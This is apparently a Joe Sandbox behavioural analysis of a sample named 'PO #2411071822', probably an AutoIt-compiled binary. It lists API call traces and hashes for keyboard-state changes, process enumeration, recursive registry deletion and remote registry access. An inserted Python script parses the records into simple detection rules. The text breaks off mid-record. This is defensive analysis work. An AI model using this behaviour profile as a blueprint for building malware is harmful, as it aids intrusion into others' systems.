• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: 0f92398b0790a3f7e0e82493f34ac45ed07ba525576c0ba31f89a94a40b45741
• Instruction ID: fa63be19b8bd96d8f67619561e1ea609a66fa311abddba109834ffd307550752
• Opcode Fuzzy Hash: 0f92398b0790a3f7e0e82493f34ac45ed07ba525576c0ba31f89a94a40b45741
• Instruction Fuzzy Hash: 5951F3A0B143E53DFB364A24AC05BB77EB95B06305F48448AE0D9869C3D2DCAEC8D759
APIs
• GetParent.USER32(00000000), ref: 00423C02
• GetKeyboardState.USER32(?), ref: 00423C17
• SetKeyboardState.USER32(?), ref: 00423C78
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00423CA4
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00423CC1
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00423D05
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00423D26
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: 78d8662ca753a5c32df9bdc1afea5408c6ccc8ae18c27e116e2ef794eff4a4dc
• Instruction ID: f2931b5da700998fe3f9cbf14b42aaa636316590432212e0f0b77c221f002b14
• Opcode Fuzzy Hash: 78d8662ca753a5c32df9bdc1afea5408c6ccc8ae18c27e116e2ef794eff4a4dc
• Instruction Fuzzy Hash: F45137A17143E13DFB328B259C05B77BEB8AB06305F48848AF0C5565C3D29CEE84E758
                                                                                                              APIs
                                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00443DA1
                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00443DCB
                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00443E80
                                                                                                                • Part of subcall function 00443D72: RegCloseKey.ADVAPI32(?), ref: 00443DE8
                                                                                                                • Part of subcall function 00443D72: FreeLibrary.KERNEL32(?), ref: 00443E3A
                                                                                                                • Part of subcall function 00443D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00443E5D
                                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00443E25
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                              • String ID:
                                                                                                              • API String ID: 395352322-0
                                                                                                              • Opcode ID: bbdcc3a87ba496bbc728462069ae843f5fe608fa2bdfdedd01b71f4818dab618
                                                                                                              • Instruction ID: 7d6f24bf670aaa6cbb98c021c1fb5ef8bfbd62ffd887a6ad8a4a6df4f1a9cc61
                                                                                                              • Opcode Fuzzy Hash: bbdcc3a87ba496bbc728462069ae843f5fe608fa2bdfdedd01b71f4818dab618
                                                                                                              • Instruction Fuzzy Hash: A0311AB1E01109BFEB149F91DC85AFFB7BCEF08705F10016AE512A2250E7B49F499BA5
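The records on this page list each function's API calls in Joe Sandbox's own "APIs" format, with "Part of subcall function" entries for calls reached through a callee. The script below is an added example, not part of Joe Sandbox or of the analysed sample: it parses those records into per-function call sets and applies two behaviour rules of its own (Toolhelp32 process enumeration, and registry key deletion that is recursive). The recursion check is a heuristic: when a "subcall" function's refs fall inside the address range of the record's own direct calls, the record's function is calling itself, which is what the 00443D72 routine above does (RegEnumKeyExW, then RegDeleteKeyW, re-entering itself for each subkey). The sample input is copied from the registry record above and from the CreateToolhelp32Snapshot record later on this page; the rule names are the example's own labels, not Joe Sandbox signature names.

```python
"""Parse Joe Sandbox per-function 'APIs' records and match behaviour rules.

Added example; not Joe Sandbox code. Rule names are this script's own labels.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: lines copied verbatim from two records of this report.
SAMPLE = """\
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00443DA1
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00443DCB
• FreeLibrary.KERNEL32(00000000), ref: 00443E80
  • Part of subcall function 00443D72: RegCloseKey.ADVAPI32(?), ref: 00443DE8
  • Part of subcall function 00443D72: FreeLibrary.KERNEL32(?), ref: 00443E3A
  • Part of subcall function 00443D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00443E5D
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00443E25
Memory Dump Source
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 00441C18
• Process32FirstW.KERNEL32(00000000,?), ref: 00441C26
• __wsplitpath.LIBCMT ref: 00441C54
  • Part of subcall function 00401DFC: __wsplitpath_helper.LIBCMT ref: 00401E3C
• _wcscat.LIBCMT ref: 00441C69
• Process32NextW.KERNEL32(00000000,?), ref: 00441CDF
• CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00441CF1
Memory Dump Source
"""

# One API line: optional subcall prefix, Api.MODULE, optional (args), ref: address.
CALL_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: int                 # address of the call site
    subcall: Optional[int]   # callee through which the API is reached, or None


@dataclass
class Record:
    calls: List[Call] = field(default_factory=list)

    def direct(self) -> List[Call]:
        return [c for c in self.calls if c.subcall is None]

    def apis(self) -> set:
        return {c.api for c in self.calls}

    def self_recursive_subcalls(self) -> set:
        """Subcall addresses whose refs lie inside this record's own direct-call
        address range; such a 'callee' is the record's function itself."""
        refs = [c.ref for c in self.direct()]
        if not refs:
            return set()
        lo, hi = min(refs), max(refs)
        return {c.subcall for c in self.calls
                if c.subcall is not None and lo <= c.ref <= hi}


def parse_records(text: str) -> List[Record]:
    """Split the report text into records; a record starts at 'APIs' and ends
    at the next 'Strings' or 'Memory Dump Source' heading."""
    records, cur = [], None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            cur = Record()
            records.append(cur)
            continue
        if s in ("Strings", "Memory Dump Source"):
            cur = None
            continue
        m = CALL_RE.match(line) if cur is not None else None
        if not m:
            continue
        args = [a for a in (m.group("args") or "").split(",") if a]
        sub = int(m.group("sub"), 16) if m.group("sub") else None
        cur.calls.append(Call(m.group("api"), m.group("module"), args,
                              int(m.group("ref"), 16), sub))
    return records


def rule_process_enum(r: Record) -> bool:
    a = r.apis()
    return ("CreateToolhelp32Snapshot" in a
            and bool(a & {"Process32First", "Process32FirstW"})
            and bool(a & {"Process32Next", "Process32NextW"}))


def rule_registry_delete(r: Record) -> bool:
    return bool(r.apis() & {"RegDeleteKeyA", "RegDeleteKeyW", "RegDeleteKeyExW"})


def rule_recursive_registry_delete(r: Record) -> bool:
    return (rule_registry_delete(r)
            and bool(r.apis() & {"RegEnumKeyExA", "RegEnumKeyExW", "RegEnumKeyW"})
            and bool(r.self_recursive_subcalls()))


RULES = [("process enumeration via Toolhelp32", rule_process_enum),
         ("registry key deletion", rule_registry_delete),
         ("recursive registry key deletion", rule_recursive_registry_delete)]


def classify(text: str):
    """Return [(lowest direct ref or None, [matched rule names]), ...] per record."""
    out = []
    for rec in parse_records(text):
        refs = [c.ref for c in rec.direct()]
        out.append((min(refs) if refs else None,
                    [name for name, fn in RULES if fn(rec)]))
    return out


if __name__ == "__main__":
    for first, hits in classify(SAMPLE):
        print(f"{first:08X}" if first is not None else "--------", hits)
```

Run it over the whole "APIs" section of a report dump (paste the text into SAMPLE or read it from a file) to get a per-function list of behaviours; the heuristic only sees call sites, so a function that recurses through a wrapper outside its own address range will not be flagged.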
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00448FE7
                                                                                                              • GetWindowLongW.USER32(00D4E998,000000F0), ref: 0044901A
                                                                                                              • GetWindowLongW.USER32(00D4E998,000000F0), ref: 0044904F
                                                                                                              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00449081
                                                                                                              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004490AB
                                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 004490BC
                                                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004490D6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: LongWindow$MessageSend
                                                                                                              • String ID:
                                                                                                              • API String ID: 2178440468-0
                                                                                                              • Opcode ID: bea5dc7d0b604c9462d14dcdcffa984ba9d2f8742781542eafe7b437b36b56a7
                                                                                                              • Instruction ID: 10039551bf224fb0f169e7c07a4c388b8a32daf60094750845882c7bcc6493a6
                                                                                                              • Opcode Fuzzy Hash: bea5dc7d0b604c9462d14dcdcffa984ba9d2f8742781542eafe7b437b36b56a7
                                                                                                              • Instruction Fuzzy Hash: 4B311534B002159FEB20CF58DC84F6677A5FB4A754F144166F619CB2B2CBB5AC40EB49
                                                                                                              APIs
                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004208F2
                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00420918
                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 0042091B
                                                                                                              • SysAllocString.OLEAUT32(?), ref: 00420939
                                                                                                              • SysFreeString.OLEAUT32(?), ref: 00420942
                                                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00420967
                                                                                                              • SysAllocString.OLEAUT32(?), ref: 00420975
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                              • String ID:
                                                                                                              • API String ID: 3761583154-0
                                                                                                              • Opcode ID: f8c2cc13a069ebbea2f1a7981c387869adb2e65f7e884c97e348f22dca486dcd
                                                                                                              • Instruction ID: fac49f6a4c2f002c9b5d6f5c10c6d22820bfde9d878786e694011458e33290f2
                                                                                                              • Opcode Fuzzy Hash: f8c2cc13a069ebbea2f1a7981c387869adb2e65f7e884c97e348f22dca486dcd
                                                                                                              • Instruction Fuzzy Hash: 7021A9B6B01219AF9B109F78DC88DBB73ECEF09360B408126F915DB252E674EC45C769
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __wcsnicmp
                                                                                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                              • API String ID: 1038674560-2734436370
                                                                                                              • Opcode ID: 2d115ba8308fee44ce13eb29c7d7216d157161e99e83f606e4eaade9279217c8
                                                                                                              • Instruction ID: bf87036719c71e2f4c384ba3f8707fcf63156b3816d89439069212bc894cc527
                                                                                                              • Opcode Fuzzy Hash: 2d115ba8308fee44ce13eb29c7d7216d157161e99e83f606e4eaade9279217c8
                                                                                                              • Instruction Fuzzy Hash: 2D214B3230413176C321BA24AE02FB77398DF55304FA0842BF54AA7181E7AD9982C29D
                                                                                                              APIs
                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004209CB
                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004209F1
                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 004209F4
                                                                                                              • SysAllocString.OLEAUT32 ref: 00420A15
                                                                                                              • SysFreeString.OLEAUT32 ref: 00420A1E
                                                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00420A38
                                                                                                              • SysAllocString.OLEAUT32(?), ref: 00420A46
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                              • String ID:
                                                                                                              • API String ID: 3761583154-0
                                                                                                              • Opcode ID: ba0414992a03cf6929a29808a4edff3f59d047d7055d4fb6b43b7ca38fe6cf4b
                                                                                                              • Instruction ID: 3abc2051ec73ac6b8b686a978339516bdc25d60674f282ee210b1c013a2d912c
                                                                                                              • Opcode Fuzzy Hash: ba0414992a03cf6929a29808a4edff3f59d047d7055d4fb6b43b7ca38fe6cf4b
                                                                                                              • Instruction Fuzzy Hash: 67214775700214AFDB109FA8DC89DAB77ECEF593607848126F909CB261EA74EC418769
                                                                                                              APIs
                                                                                                                • Part of subcall function 003FD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 003FD1BA
                                                                                                                • Part of subcall function 003FD17C: GetStockObject.GDI32(00000011), ref: 003FD1CE
                                                                                                                • Part of subcall function 003FD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 003FD1D8
                                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0044A32D
                                                                                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0044A33A
                                                                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0044A345
                                                                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0044A354
                                                                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0044A360
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$CreateObjectStockWindow
                                                                                                              • String ID: Msctls_Progress32
                                                                                                              • API String ID: 1025951953-3636473452
                                                                                                              • Opcode ID: bc50a55e77dc0eab0a75d4136291728b3e17d76efab711a632de9de933530e81
                                                                                                              • Instruction ID: 5b278528da9d91365a09309c3efc0e4b99cc6175e20e27b50720dbe34e3db618
                                                                                                              • Opcode Fuzzy Hash: bc50a55e77dc0eab0a75d4136291728b3e17d76efab711a632de9de933530e81
                                                                                                              • Instruction Fuzzy Hash: 8411D0B1540219BEFF118F61CC85EEB7F6DFF08398F014115FA08A60A0C6769C22DBA8
                                                                                                              APIs
                                                                                                              • GetClientRect.USER32(?,?), ref: 003FCCF6
                                                                                                              • GetWindowRect.USER32(?,?), ref: 003FCD37
                                                                                                              • ScreenToClient.USER32(?,?), ref: 003FCD5F
                                                                                                              • GetClientRect.USER32(?,?), ref: 003FCE8C
                                                                                                              • GetWindowRect.USER32(?,?), ref: 003FCEA5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Rect$Client$Window$Screen
                                                                                                              • String ID:
                                                                                                              • API String ID: 1296646539-0
                                                                                                              • Opcode ID: 91cb52111a3341a898b0ef25f33e9e6ce2f0492f46f37726c8edf8794f7dd568
                                                                                                              • Instruction ID: ef9c444c5b9c6ab337243403ef80c47de1252525cbedc91faafd59805af0c339
                                                                                                              • Opcode Fuzzy Hash: 91cb52111a3341a898b0ef25f33e9e6ce2f0492f46f37726c8edf8794f7dd568
                                                                                                              • Instruction Fuzzy Hash: 6AB18B79A0024DDBDF14CFA8C5807EEBBB0FF18301F14912AED59AB251DB34AA50CB64
                                                                                                              APIs
                                                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00441C18
                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00441C26
                                                                                                              • __wsplitpath.LIBCMT ref: 00441C54
                                                                                                                • Part of subcall function 00401DFC: __wsplitpath_helper.LIBCMT ref: 00401E3C
                                                                                                              • _wcscat.LIBCMT ref: 00441C69
                                                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00441CDF
                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00441CF1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                               • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                                              • String ID:
                                                                                                              • API String ID: 1380811348-0
                                                                                                              • Opcode ID: 1225b7efe2668db4adbe558bed2ad9c7ec8bf674ddf0a356833c11eed6731e32
                                                                                                              • Instruction ID: 975f5f87e1dd814f2434525e307771fdd3299a7806a192404c4311e16993890e
                                                                                                              • Opcode Fuzzy Hash: 1225b7efe2668db4adbe558bed2ad9c7ec8bf674ddf0a356833c11eed6731e32
                                                                                                              • Instruction Fuzzy Hash: DC51AEB15043449FD721EF25C881EABB7E8EF88754F00492EF58597291EB74E904CB96
                                                                                                              APIs
                                                                                                                • Part of subcall function 00443C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00442BB5,?,?), ref: 00443C1D
                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004430AF
                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004430EF
                                                                                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00443112
                                                                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0044313B
                                                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0044317E
                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0044318B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                               • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 3451389628-0
                                                                                                              • Opcode ID: 3f0cccf9c976f74cdb364700d2b801b9ecb31b569da8ab4135a5fced347beedb
                                                                                                              • Instruction ID: c6d31bb7cb8015f0a099342b22e639e94d9856a4f26c1d4789155e25455e237e
                                                                                                              • Opcode Fuzzy Hash: 3f0cccf9c976f74cdb364700d2b801b9ecb31b569da8ab4135a5fced347beedb
                                                                                                              • Instruction Fuzzy Hash: 59518631608240AFD705EF65C881E6EBBE9FF88704F044A2EF5558B2A1DB74EA05CB56
                                                                                                              APIs
                                                                                                              • GetMenu.USER32(?), ref: 00448540
                                                                                                              • GetMenuItemCount.USER32(00000000), ref: 00448577
                                                                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0044859F
                                                                                                              • GetMenuItemID.USER32(?,?), ref: 0044860E
                                                                                                              • GetSubMenu.USER32(?,?), ref: 0044861C
                                                                                                               • PostMessageW.USER32(?,00000111,?,00000000), ref: 0044866D (0x0111 = WM_COMMAND)
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                               • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Menu$Item$CountMessagePostString
                                                                                                              • String ID:
                                                                                                              • API String ID: 650687236-0
                                                                                                              • Opcode ID: c4a0cad86d14c8a11a7d8cae72945d6df9f353e1b6cc4372a74b17da4aebd155
                                                                                                              • Instruction ID: 2849e64676434943888c89ce463f61567d6a1ca4cb59433d71b09a2cf604a6cf
                                                                                                              • Opcode Fuzzy Hash: c4a0cad86d14c8a11a7d8cae72945d6df9f353e1b6cc4372a74b17da4aebd155
                                                                                                              • Instruction Fuzzy Hash: 4351C131E00128EFDF01EF55C941AAEB7F4EF08310F11446AE905BB391DB74AE418B99
                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 00424B10
                                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00424B5B
                                                                                                              • IsMenu.USER32(00000000), ref: 00424B7B
                                                                                                              • CreatePopupMenu.USER32 ref: 00424BAF
                                                                                                              • GetMenuItemCount.USER32(000000FF), ref: 00424C0D
                                                                                                              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00424C3E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                               • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                              • String ID:
                                                                                                              • API String ID: 3311875123-0
                                                                                                              • Opcode ID: 8e248bb8f5fd4276b5020b39bc0357d628bafd94b78c20242387fb81284dc6af
                                                                                                              • Instruction ID: a8c4154460cb0174a39ebceaed98a50dd48666b9705ec2b1c163a4eeb5ab34a2
